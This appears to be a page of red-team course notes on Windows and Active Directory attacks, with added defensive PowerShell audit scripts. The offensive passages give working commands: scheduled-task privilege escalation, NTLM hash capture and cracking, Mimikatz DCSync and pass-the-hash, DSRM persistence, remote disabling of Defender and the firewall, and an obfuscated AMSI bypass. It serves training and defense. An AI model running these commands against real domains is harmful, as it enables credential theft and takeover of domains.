
The commands executed can be found here:
https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main
winPEAS (winPEAS has Watson embedded)
Github repos of exploits:
https://github.com/nomi-sec/PoC-in-GitHub
https://github.com/abatchy17/WindowsExploits
https://github.com/SecWiki/windows-kernel-exploits
https://github.com/rasta-mouse/Sherlock
https://github.com/rasta-mouse/Watson
PS C:\AD> Import-Module .\Sherlock.ps1
PS C:\AD> Find-AllVulns
#change directory to where Jaws is located
cd c:\ad
#Run from CMD:
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
#Manually Search
schtasks /query /fo LIST 2>nul | findstr TaskName
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
schtasks /query /fo LIST /v > C:\Users\student1\Desktop\task.txt
#Edit the file executed by Administrator
net user /add rabakuku Password123
net localgroup administrators rabakuku /add
#reboot
#open cmd
shutdown /r /f
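A defensive counterpart to the manual task search above, written for this page as an added example (it is not the course's code and not part of JAWS): it lists every non-Microsoft scheduled task with the identity it runs as and flags tasks whose executable, or a script passed in the arguments, can be modified by Users, Everyone, Authenticated Users or INTERACTIVE, which is the misconfiguration the steps above exploit. It assumes the ScheduledTasks module (Windows 8 / Server 2012 or later) and an elevated session; the list of "broad" principals is an assumption to tune.

```powershell
# Added hardening check (not from the course or JAWS): find scheduled tasks whose action
# files are writable by broad low-privilege groups. Assumes the ScheduledTasks module.

$BroadPrincipals = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
$WriteMask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'

function Resolve-ActionFile {
    # Turns an Execute string or one argument token into an on-disk path, or $null
    param([string]$Token)
    $p = [Environment]::ExpandEnvironmentVariables($Token.Trim('"', "'"))
    if (Test-Path -LiteralPath $p -PathType Leaf) { return (Resolve-Path -LiteralPath $p).Path }
    # Bare names such as powershell.exe resolve through PATH
    $cmd = Get-Command $p -CommandType Application -ErrorAction SilentlyContinue
    if ($cmd) { return $cmd.Source }
    return $null
}

function Test-BroadWriteAccess {
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            $BroadPrincipals -contains $ace.IdentityReference.Value -and
            (($ace.FileSystemRights -band $WriteMask) -ne 0)) {
            return $true
        }
    }
    return $false
}

function Find-TasksWithWritableActions {
    Get-ScheduledTask | Where-Object { $_.TaskPath -notlike '\Microsoft*' } | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }       # COM-handler actions have no file
            # Candidate files: the executable itself plus any argument that points at a script
            $tokens = @($action.Execute)
            if ($action.Arguments) {
                $tokens += [regex]::Matches($action.Arguments, '"[^"]+"|\S+') | ForEach-Object { $_.Value }
            }
            foreach ($token in $tokens) {
                $file = Resolve-ActionFile $token
                if ($file -and (Test-BroadWriteAccess $file)) {
                    [pscustomobject]@{
                        TaskName     = $task.TaskName
                        RunAs        = $task.Principal.UserId
                        WritableFile = $file
                    }
                }
            }
        }
    }
}

# Any row whose RunAs is SYSTEM or an administrator is a privilege-escalation path: fix the file ACL
Find-TasksWithWritableActions | Format-Table -AutoSize
```

The fix for each row is to tighten the ACL on the file (or move it under a protected directory such as Program Files), not to change the task; a task running as SYSTEM with a user-writable action is exactly what the `net user /add` step above relies on.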
Recommended Windows Hack The Box machines to Practice Privilege Escalation
Regrettably, the vast majority of HTB Windows machines require kernel exploits for privilege escalation. I found the following machines helpful for practicing priv esc (read, not your typical privilege escalation).
Chatterbox
Jeeves
Access
Active
SecNotes
Good Read:
https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=net-5.0
https://github.com/sense-of-security/ADRecon
.\ADRecon.ps1 -OutputType HTML
Download Bloodhound GUI
https://github.com/BloodHoundAD/BloodHound/releases
Download and install Java
https://www.java.com/en/download/
Download JDK
https://jdk.java.net/archive/
setx -m JAVA_HOME "C:\AD\Bloodhound\jdk-11.0.9"
Download Neo4j
https://neo4j.com/download-center/#community
neo4j.bat install-service
neo4j-admin set-initial-password yourpasswordhere
neo4j.bat start
neo4j.bat stop
Download SharpHound
https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors
powershell -ep bypass
import-module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Verbose -Domain pentesting
BloodHound Website
https://bloodhound.readthedocs.io/en/latest/index.html
A Pass-the-Hash (PtH) attack is a technique whereby an attacker captures a password hash (as opposed to the password characters) and then simply passes it through for authentication and potentially lateral access to other networked systems. The threat actor doesn't need to crack the hash to obtain the plaintext password. PtH attacks exploit the authentication protocol, as the password hash remains static for every session until the password is rotated. Attackers commonly obtain hashes by scraping a system's active memory, among other techniques.
In a pass-the-ticket attack, an attacker extracts a Kerberos Ticket Granting Ticket (TGT) from LSASS memory on one system and then uses it on another system to request Kerberos service tickets (TGS) and gain access to network resources.
One primary difference between pass-the-hash and pass-the-ticket is that Kerberos TGTs expire (10 hours by default), whereas NTLM hashes only change when the user changes their password. So a TGT must be used within its lifetime, although it can be renewed for a longer period (7 days by default).
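Both attacks start with credential material scraped from LSASS, so the first defensive question is whether the host makes that scraping easy. The audit below is an added example for this page (not the course's code): it reads the LSA Protection, WDigest and Credential Guard state on the local machine and, for the domain, lists Domain Admins who are not yet in the Protected Users group, whose members cannot use NTLM at all and get 4-hour, non-renewable TGTs. It assumes an elevated session, Windows 8.1 / Server 2012 R2 or later, and the ActiveDirectory module for the group query.

```powershell
# Added defensive example (not part of the course material): audit the host settings that
# decide how easy it is to scrape NTLM hashes and Kerberos tickets out of LSASS, and list
# Domain Admins that are not yet in Protected Users. Run elevated; the AD part needs RSAT.

function Get-RegValue {
    param([string]$Path, [string]$Name)
    # Returns $null when the key or value is absent instead of throwing
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

function Test-LsassCredentialProtection {
    $lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $results = @()

    # RunAsPPL=1: LSASS runs as a protected process, so unsigned tools cannot read its memory
    $ppl = Get-RegValue $lsa 'RunAsPPL'
    $results += [pscustomobject]@{
        Control = 'LSA Protection (RunAsPPL)'
        Value   = $ppl
        Status  = if ($ppl -ge 1) { 'OK' } else { 'WEAK: LSASS memory readable by any local admin' }
    }

    # WDigest UseLogonCredential=1 keeps cleartext passwords in LSASS; 0 (default since 8.1) does not
    $wdigest = Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' 'UseLogonCredential'
    $results += [pscustomobject]@{
        Control = 'WDigest UseLogonCredential'
        Value   = $wdigest
        Status  = if ($wdigest -eq 1) { 'WEAK: cleartext passwords cached' } else { 'OK' }
    }

    # Credential Guard isolates NTLM hashes and TGTs in a VBS enclave; 1 in SecurityServicesRunning means active
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    $cgOn = ($null -ne $dg) -and ($dg.SecurityServicesRunning -contains 1)
    $results += [pscustomobject]@{
        Control = 'Credential Guard'
        Value   = if ($cgOn) { 'running' } else { 'not running' }
        Status  = if ($cgOn) { 'OK' } else { 'WEAK: hashes and tickets live in LSASS' }
    }
    return $results
}

function Get-DomainAdminsOutsideProtectedUsers {
    # Protected Users members cannot authenticate with NTLM and receive 4-hour,
    # non-renewable TGTs, which blunts both pass-the-hash and pass-the-ticket for them.
    Import-Module ActiveDirectory
    $protected = Get-ADGroupMember -Identity 'Protected Users' -Recursive |
        Select-Object -ExpandProperty SamAccountName
    Get-ADGroupMember -Identity 'Domain Admins' -Recursive |
        Where-Object { $_.objectClass -eq 'user' -and $protected -notcontains $_.SamAccountName } |
        Select-Object SamAccountName, DistinguishedName
}

Test-LsassCredentialProtection | Format-Table -AutoSize
Get-DomainAdminsOutsideProtectedUsers | Format-Table -AutoSize
```

Run it on the workstations where admins log on interactively, not only on the DC: a hash scraped from a helpdesk machine is what gets passed to the DC.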
#Download Inveigh here:
https://github.com/Kevin-Robertson/InveighZero
The SMB Relay attack abuses the NTLM challenge-response protocol.
Historically, all SMB sessions used the NTLM protocol for authentication and session security (i.e. NTLM over SMB).
However, most sysadmins switched to KILE (Kerberos) over SMB after research showed that the first version of NTLM is susceptible to man-in-the-middle attacks,
the SMB Relay attack counting among them.
#Run Inveigh.exe as Admin
Inveigh.exe
#Send the captured hash offline for cracking
hashcat -m 5600 hadams.txt rockyou.txt
-m = hash mode (5600 = NetNTLMv2)
hadams.txt = file containing the captured hash
rockyou.txt = the wordlist
https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/
https://book.hacktricks.xyz/windows/stealing-credentials
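A relay only succeeds when the service that receives the relayed authentication does not require signing, and the poisoning step Inveigh performs only works while LLMNR or NetBIOS name service answers are trusted. The check below is an added example for this page (not the course's or Inveigh's code) that reads those settings on one host: SMB server and client signing requirement, LmCompatibilityLevel (whether LM/NTLMv1 responses are still produced or accepted), LLMNR and NetBIOS over TCP/IP. It assumes an elevated session on Windows 8 / Server 2012 or later (SmbShare module).

```powershell
# Added defensive example (not part of the course material): check the settings that decide
# whether an NTLM relay against or from this host can succeed. Signing must be *required*
# (merely enabled still admits a relayed session), NTLMv1 must be refused, and the
# LLMNR/NetBIOS name resolution that poisoners abuse should be off. Run elevated.

function Get-RegValue {
    param([string]$Path, [string]$Name)
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

function Test-NtlmRelayMitigations {
    $results = @()

    # SMB server: RequireSecuritySignature=$true rejects unsigned (i.e. relayed) sessions
    $srv = Get-SmbServerConfiguration
    $results += [pscustomobject]@{
        Control = 'SMB server signing required'
        Value   = $srv.RequireSecuritySignature
        Status  = if ($srv.RequireSecuritySignature) { 'OK' } else { 'WEAK: inbound SMB can be relayed to this host' }
    }

    # SMB client: required signing stops this host's own sessions being relayed elsewhere
    $cli = Get-SmbClientConfiguration
    $results += [pscustomobject]@{
        Control = 'SMB client signing required'
        Value   = $cli.RequireSecuritySignature
        Status  = if ($cli.RequireSecuritySignature) { 'OK' } else { 'WEAK: outbound sessions can be relayed' }
    }

    # LmCompatibilityLevel: 3-4 send NTLMv2 only, 5 additionally refuses LM/NTLMv1 from clients.
    # A missing value means the OS default (3 on current Windows).
    $lm = Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' 'LmCompatibilityLevel'
    if ($null -eq $lm) { $lm = 3 }
    $results += [pscustomobject]@{
        Control = 'LmCompatibilityLevel'
        Value   = $lm
        Status  = if ($lm -ge 5) { 'OK' }
                  elseif ($lm -ge 3) { 'PARTIAL: NTLMv1 still accepted from clients' }
                  else { 'WEAK: LM/NTLMv1 responses in use' }
    }

    # LLMNR: EnableMulticast=0 under the DNSClient policy key disables it
    $llmnr = Get-RegValue 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient' 'EnableMulticast'
    $results += [pscustomobject]@{
        Control = 'LLMNR disabled'
        Value   = $llmnr
        Status  = if ($llmnr -eq 0) { 'OK' } else { 'WEAK: LLMNR answers can be spoofed' }
    }

    # NetBIOS over TCP/IP: TcpipNetbiosOptions=2 disables it per adapter
    $nbt = Get-CimInstance Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE' |
        Where-Object { $_.TcpipNetbiosOptions -ne 2 } |
        Select-Object -ExpandProperty Description
    $results += [pscustomobject]@{
        Control = 'NetBIOS-NS disabled on all adapters'
        Value   = if ($nbt) { $nbt -join '; ' } else { 'none enabled' }
        Status  = if ($nbt) { 'WEAK: NBT-NS answers can be spoofed' } else { 'OK' }
    }
    return $results
}

Test-NtlmRelayMitigations | Format-Table -AutoSize
```

Signing is the control that matters most here: with LLMNR off an attacker still has other ways to trigger an NTLM authentication, but with signing required on every SMB server the relayed session is rejected whatever triggered it.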
More on ACL:
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces
DCSync is a credential dumping technique that can lead to the compromise of individual user credentials, and more seriously as a prelude to the creation of a Golden Ticket, as DCSync can be used to compromise the krbtgt account’s password.
To perform a DCSync attack, an adversary must have compromised a user with the Replicating Directory Changes All and Replicating Directory Changes privileges. Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have these privileges by default. It is also possible for any user to be granted these specific privileges. Once obtained, an adversary uses the Directory Replication Service (DRS) Remote Protocol to replicate data (including credentials) from Active Directory.
The KRBTGT is a local default account that acts as a service account for the Key Distribution Center (KDC) service. It is created automatically when a new domain is created. It cannot be deleted, its name cannot be changed, and it cannot be enabled.
The KDC service handles all Kerberos ticket requests, so the KRBTGT account plays a key role in AD: its key is used to encrypt and sign all Kerberos tickets for the domain.
Get-ForestGlobalCatalog
Get-DomainUser -Name student1
#Get the object ACL for the pentesting.local forest
Get-ObjectACL "DC=pentesting,DC=local" -ResolveGUIDs
#Get the object ACL matching ObjectAceType = DS-Replication for the pentesting.local forest
Get-ObjectACL "DC=pentesting,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -like 'DS-Replication*') }
#Get the object ACL matching ObjectAceType = DS-Replication and SecurityIdentifier for my current user = for the pentesting.local forest
Get-ObjectACL "DC=pentesting,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -like 'DS-Replication*') -and ($_.SecurityIdentifier -match 'S-1-5-21-1070240333-336889418-1185445934-1603') }
#Get the all the ACL in the pentesting.local forest for my current SecurityIdentifier
Get-ObjectACL "DC=pentesting,DC=local" -ResolveGUIDs | ? { ($_.SecurityIdentifier -match 'S-1-5-21-1070240333-336889418-1185445934-1603') }
#DCSync the domain administrator's credentials (NTLM hash) from the DC
invoke-mimikatz -Command '"lsadump::dcsync /user:pentesting\administrator"'
#pass the hash to become the administrator
Invoke-Mimikatz -Command '"sekurlsa::pth /user:administrator /domain: /ntlm: /run:powershell.exe"'
#see if we are administrator
invoke-command -ComputerName dc.pentesting.local -ScriptBlock{whoami;hostname}
#enter powershell session for the dc as the administrator
Enter-PSSession -ComputerName dc.pentesting.local
hostname
whoami
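The PowerView queries above answer "does my user have replication rights"; the defender's version of the question is "who has them at all". The script below is an added example for this page (not the course's code): it reads the same domain-head ACL with the ActiveDirectory module and keeps only ACEs that grant DCSync capability, namely the three DS-Replication extended rights, an ExtendedRight ACE with an empty ObjectType (all extended rights), or GenericAll. It assumes RSAT, a domain DN taken from the course lab (pentesting.local), and an allow-list of expected holders that is an assumption to tune for your domain (the group names carry the domain's NetBIOS prefix).

```powershell
# Added defensive example (not from the course): list every principal that can DCSync.
# Assumes the ActiveDirectory module; domain DN and expected-holder list are lab assumptions.

Import-Module ActiveDirectory

# Control-access-right GUIDs defined in the AD schema
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}
$AllGuid = [guid]::Empty

# Principals that normally hold replication rights on a domain head (assumption: adjust the
# NetBIOS prefix of the domain-specific groups to your own domain)
$ExpectedHolders = @(
    'NT AUTHORITY\SYSTEM',
    'BUILTIN\Administrators',
    'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS',
    'NT AUTHORITY\ENTERPRISE READ-ONLY DOMAIN CONTROLLERS',
    'PENTESTING\Domain Controllers'
)

function Get-DcSyncCapablePrincipals {
    param([string]$DomainDn = 'DC=pentesting,DC=local')
    $acl = Get-Acl -Path "AD:\$DomainDn"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $rights = $ace.ActiveDirectoryRights
        $guid   = $ace.ObjectType
        $why    = $null
        if ($rights -band [System.DirectoryServices.ActiveDirectoryRights]::GenericAll) {
            $why = 'GenericAll (implies every extended right)'
        } elseif ($rights -band [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight) {
            if ($guid -eq $AllGuid) { $why = 'All extended rights' }
            elseif ($ReplicationRights.ContainsKey($guid.ToString())) { $why = $ReplicationRights[$guid.ToString()] }
        }
        if ($why) {
            [pscustomobject]@{
                Identity  = $ace.IdentityReference.Value
                Grants    = $why
                Inherited = $ace.IsInherited
                Expected  = $ExpectedHolders -contains $ace.IdentityReference.Value
            }
        }
    }
}

# Any row with Expected=False is a DCSync path to investigate and, usually, remove
Get-DcSyncCapablePrincipals | Sort-Object Expected, Identity | Format-Table -AutoSize
```

Run it on a schedule and diff the output: an attacker who adds Get-Changes-All to a low-privilege user (the persistence variant of the lab above) shows up as a new unexpected row, which is far cheaper to catch than the resulting replication traffic.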
Zerologon, tracked as CVE-2020-1472, is an authentication bypass vulnerability in the Netlogon Remote Protocol (MS-NRPC), a remote procedure call (RPC) interface that Windows uses to authenticate users and computers on domain-based networks. It was designed for specific tasks such as maintaining relationships between members of domains and the domain controller (DC), or between multiple domain controllers across one or multiple domains and replicating the domain controller database.
Kerberos constrained delegation was introduced in Windows Server 2003 to provide a safer form of delegation that could be used by services.
When it is configured, constrained delegation restricts the services to which the specified server can act on behalf of a user.
This requires domain administrator privileges to configure a domain account for a service, and it restricts the account to a single domain.
In today's enterprise, front-end services are not designed to be limited to integration with only services in their own domain.
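An inventory of every account that can delegate is the starting point for reviewing this feature. The script below is an added example for this page (not the course's code): it queries the flags that distinguish the three forms of delegation, namely unconstrained (TRUSTED_FOR_DELEGATION, userAccountControl bit 0x80000), constrained (msDS-AllowedToDelegateTo, with protocol transition if TRUSTED_TO_AUTH_FOR_DELEGATION, bit 0x1000000, is also set) and resource-based (msDS-AllowedToActOnBehalfOfOtherIdentity on the target object). It assumes the ActiveDirectory module and that domain controllers (primary group 516, RODCs 521) are unconstrained by design and should be skipped.

```powershell
# Added defensive example (not from the course): inventory Kerberos delegation settings.
# Assumes the ActiveDirectory module; run with a domain account that can read AD.

Import-Module ActiveDirectory

$TRUSTED_FOR_DELEGATION         = 0x80000    # unconstrained: host collects callers' TGTs
$TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition: impersonate anyone to the listed SPNs

function Get-DelegationInventory {
    # Bitwise LDAP matching rule 1.2.840.113556.1.4.803 tests userAccountControl flags
    $ldap = '(|(userAccountControl:1.2.840.113556.1.4.803:=524288)' +
            '(userAccountControl:1.2.840.113556.1.4.803:=16777216)' +
            '(msDS-AllowedToDelegateTo=*)' +
            '(msDS-AllowedToActOnBehalfOfOtherIdentity=*))'
    $props = 'userAccountControl', 'primaryGroupID', 'msDS-AllowedToDelegateTo',
             'msDS-AllowedToActOnBehalfOfOtherIdentity', 'servicePrincipalName'

    Get-ADObject -LDAPFilter $ldap -Properties $props | ForEach-Object {
        $uac  = [int]$_.userAccountControl
        $isDc = $_.primaryGroupID -in 516, 521
        $rbcd = $_.'msDS-AllowedToActOnBehalfOfOtherIdentity'
        $rbcdFrom = if ($rbcd -and $rbcd.Access) {
            ($rbcd.Access | ForEach-Object { $_.IdentityReference.Value }) -join '; '
        } else { '' }

        $kind = @()
        if (($uac -band $TRUSTED_FOR_DELEGATION) -and -not $isDc) { $kind += 'UNCONSTRAINED' }
        if ($_.'msDS-AllowedToDelegateTo') {
            $kind += if ($uac -band $TRUSTED_TO_AUTH_FOR_DELEGATION) { 'CONSTRAINED+PROTOCOL-TRANSITION' } else { 'CONSTRAINED' }
        }
        if ($rbcdFrom) { $kind += 'RESOURCE-BASED (target)' }
        if (-not $kind) { return }   # a DC with nothing else configured

        [pscustomobject]@{
            Name          = $_.Name
            Class         = $_.ObjectClass
            Delegation    = $kind -join ', '
            AllowedTo     = ($_.'msDS-AllowedToDelegateTo' -join '; ')
            ActOnBehalfBy = $rbcdFrom
        }
    }
}

# Review every UNCONSTRAINED row first, then every PROTOCOL-TRANSITION row
Get-DelegationInventory | Sort-Object Delegation | Format-Table -AutoSize -Wrap
```

Accounts that must keep delegation should be constrained without protocol transition where the front end can obtain a real Kerberos ticket from the user, and sensitive users should be marked "Account is sensitive and cannot be delegated" or placed in Protected Users so their identity cannot be delegated at all.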
You need GenericAll or GenericWrite on the target account to set an SPN on it.
The ASREPRoast attack looks for users that have the DONT_REQ_PREAUTH attribute set, i.e. accounts for which Kerberos pre-authentication is not required.
That means that anyone can send an AS_REQ to the DC on behalf of any of those users and receive an AS_REP message.
The AS_REP contains a chunk of data encrypted with the user's key, which is derived from the user's password, so the password can be cracked offline using this message.
Furthermore, no domain account is needed to perform this attack, only network access to the DC. With a domain account, however, an LDAP query can be used to retrieve the users without Kerberos pre-authentication in the domain; otherwise usernames have to be guessed.
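Two things a defender wants from this passage: the list of exposed accounts, and a detection for the requests themselves. The block below is an added example for this page (not the course's code). `Get-PreAuthDisabledAccounts` runs the same LDAP query the text mentions (DONT_REQ_PREAUTH is userAccountControl bit 0x400000 = 4194304). `Find-AsRepRoastEvents` parses DC Security event 4768 (a TGT was requested) and flags requests that succeeded with PreAuthType 0 for an RC4-HMAC (0x17) ticket, which is the combination ASREPRoast tooling produces. The two events at the bottom are constructed samples in the real 4768 field layout, not log data from the course; the commented Get-WinEvent line shows how to feed live events. The first function assumes the ActiveDirectory module.

```powershell
# Added defensive example (not from the course): exposure query plus 4768-based detection.
# Sample events are constructed for this example; field names follow the real 4768 schema.

function Get-PreAuthDisabledAccounts {
    Import-Module ActiveDirectory
    Get-ADUser -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=4194304)' `
               -Properties PasswordLastSet, LastLogonDate |
        Select-Object SamAccountName, Enabled, PasswordLastSet, LastLogonDate
}

function Find-AsRepRoastEvents {
    param([string[]]$EventXml)
    foreach ($text in $EventXml) {
        $x  = [xml]$text
        $id = $x.Event.System.EventID
        if ($id -is [System.Xml.XmlElement]) { $id = $id.InnerText }   # EventID may carry attributes
        if ([int]$id -ne 4768) { continue }
        # Flatten <Data Name="..."> elements into a lookup table
        $d = @{}
        foreach ($node in $x.Event.EventData.Data) { $d[$node.GetAttribute('Name')] = $node.InnerText }
        # PreAuthType 0 = no pre-authentication; 0x17 = RC4-HMAC, the etype offline crackers want
        if ($d['PreAuthType'] -eq '0' -and $d['TicketEncryptionType'] -eq '0x17' -and $d['Status'] -eq '0x0') {
            [pscustomobject]@{
                User     = $d['TargetUserName']
                Domain   = $d['TargetDomainName']
                ClientIp = $d['IpAddress']
                Reason   = 'AS-REP issued without pre-auth, RC4 etype'
            }
        }
    }
}

# Constructed sample events (not real log data); the second is a normal AES logon with pre-auth
$SampleEvents = @(
@'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4768</EventID></System>
  <EventData>
    <Data Name="TargetUserName">svc_legacy</Data>
    <Data Name="TargetDomainName">PENTESTING.LOCAL</Data>
    <Data Name="TicketEncryptionType">0x17</Data>
    <Data Name="PreAuthType">0</Data>
    <Data Name="Status">0x0</Data>
    <Data Name="IpAddress">::ffff:192.168.1.55</Data>
  </EventData>
</Event>
'@,
@'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4768</EventID></System>
  <EventData>
    <Data Name="TargetUserName">student1</Data>
    <Data Name="TargetDomainName">PENTESTING.LOCAL</Data>
    <Data Name="TicketEncryptionType">0x12</Data>
    <Data Name="PreAuthType">2</Data>
    <Data Name="Status">0x0</Data>
    <Data Name="IpAddress">::ffff:192.168.1.20</Data>
  </EventData>
</Event>
'@
)

Find-AsRepRoastEvents -EventXml $SampleEvents | Format-Table -AutoSize

# Against a live DC (last 24 hours of the Security log; requires Kerberos Authentication Service auditing):
# $live = Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4768; StartTime=(Get-Date).AddDays(-1)} |
#         ForEach-Object { $_.ToXml() }
# Find-AsRepRoastEvents -EventXml $live
```

Of the two constructed events only the svc_legacy request matches. The remediation is to clear "Do not require Kerberos preauthentication" on every account the first function returns and, where an application genuinely needs it, to give that account a long random password so the AS-REP cannot be cracked.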
DSRM is Directory Services Restore Mode.
There is a local administrator on every DC called "Administrator" whose password is the DSRM password.
The DSRM password (SafeModePassword) is set when a server is promoted to a Domain Controller, and it is rarely changed afterwards.
After altering the configuration on the DC, it is possible to pass the NTLM hash of this user to access the DC.
#From a PowerShell session with Domain Admin privileges
#Create Session
$sess = New-PSSession -ComputerName dc
#Disable Firewall and AV
Invoke-Command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess
Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-Command -ScriptBlock{netsh advfirewall set allprofiles state off} -Session $sess
Invoke-Command -Session $sess -FilePath c:\AD\Tools\Invoke-mimikatz.ps1
#ByPass AMSI
powershell -ep bypass
SET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
#Enter Session
Enter-PSSession $sess
#Create the registry value
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
#If the registry value already exists:
#Get-ItemProperty to see if DsrmAdminLogonBehavior is set to 2
Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\"
#If DsrmAdminLogonBehavior is not set to 2
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2
#Get-ItemProperty to see if DsrmAdminLogonBehavior is set to 2
Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\"
#Compare the Administrator hash with the Administrator hash of below command
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dc
#Dump DSRM password (needs DA privs) to be used for the command below
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dc
---
#Use below command to pass the hash. Use the hash from the above command
#Needs to be executed from another PowerShell window with local admin rights
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'
#Session
$sess = New-PSSession -ComputerName dc
Enter-PSSession $sess
#or
ls \\dcorp-dc\c$
It simulates the behavior of a Domain Controller (using protocols such as the RPC interfaces normally used only by DCs) to inject its own data, bypassing most common security controls, including your SIEM. It shares some similarities with the DCSync attack (already present in the lsadump module of mimikatz).
Domain Admins is the AD group that most people think of when discussing Active Directory administration. This group has full admin rights by default on all domain-joined servers and workstations, Domain Controllers, and Active Directory. It gains admin rights on domain-joined computers since when these systems are joined to AD, the Domain Admins group is added to the computer’s Administrators group.
Enterprise Admins is a group in the forest root domain that has full AD rights to every domain in the AD forest. It is granted this right through membership in the Administrators group in every domain in the forest.
SID History is an attribute that supports migration scenarios. Every user account has an associated Security Identifier (SID), which is used to track the security principal and the access the account has when connecting to resources. SID History effectively lets one account's access be cloned onto another, which is extremely useful for ensuring users retain access when they are moved (migrated) from one domain to another. Since the user's SID changes when the new account is created, the old SID needs to map to the new one: when a user in Domain A is migrated to Domain B, a new user account is created in Domain B and the Domain A user's SID is added to the Domain B account's SID History attribute. This ensures that the Domain B user can still access resources in Domain A.
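The three paragraphs above describe what a defender should inventory: who is effectively in Domain Admins and Enterprise Admins once nested groups are resolved, and which SID History entries could not have come from a real migration. The script below is an added example for this page (not the course's code). A migrated user's historical SID points at the old, usually decommissioned, source domain; a SID History value whose domain part is a domain that is still live in this forest, with a well-known RID below 1000 (500 = Administrator, 512 = Domain Admins, 519 = Enterprise Admins), is the pattern injected SID History leaves. It assumes the ActiveDirectory module and is meant to run from the forest root domain, where Enterprise Admins exists.

```powershell
# Added defensive example (not from the course): tier-zero membership and SID History review.
# Assumes the ActiveDirectory module; run in the forest root domain.

Import-Module ActiveDirectory

function Get-TierZeroMembers {
    foreach ($group in 'Domain Admins', 'Enterprise Admins') {
        Get-ADGroupMember -Identity $group -Recursive | ForEach-Object {
            [pscustomobject]@{ Group = $group; Member = $_.SamAccountName; Class = $_.objectClass }
        }
    }
}

function Get-SuspiciousSidHistory {
    # SIDs of every domain currently in the forest; a genuine migration source would not be among them
    $liveDomainSids = (Get-ADForest).Domains | ForEach-Object { (Get-ADDomain -Identity $_).DomainSID.Value }

    Get-ADObject -LDAPFilter '(sIDHistory=*)' -Properties sIDHistory | ForEach-Object {
        $obj = $_
        foreach ($entry in $obj.sIDHistory) {
            $sid        = $entry.ToString()
            $cut        = $sid.LastIndexOf('-')
            $domainPart = $sid.Substring(0, $cut)
            $rid        = [int]$sid.Substring($cut + 1)
            $verdict = if ($liveDomainSids -contains $domainPart) {
                if ($rid -lt 1000) { 'ALERT: well-known RID of a live forest domain' }
                else { 'REVIEW: live forest domain, not a retired migration source' }
            } else { 'INFO: foreign SID, confirm against migration records' }
            [pscustomobject]@{ Object = $obj.Name; Class = $obj.ObjectClass; HistorySid = $sid; Verdict = $verdict }
        }
    }
}

Get-TierZeroMembers | Format-Table -AutoSize
Get-SuspiciousSidHistory | Sort-Object Verdict | Format-Table -AutoSize
```

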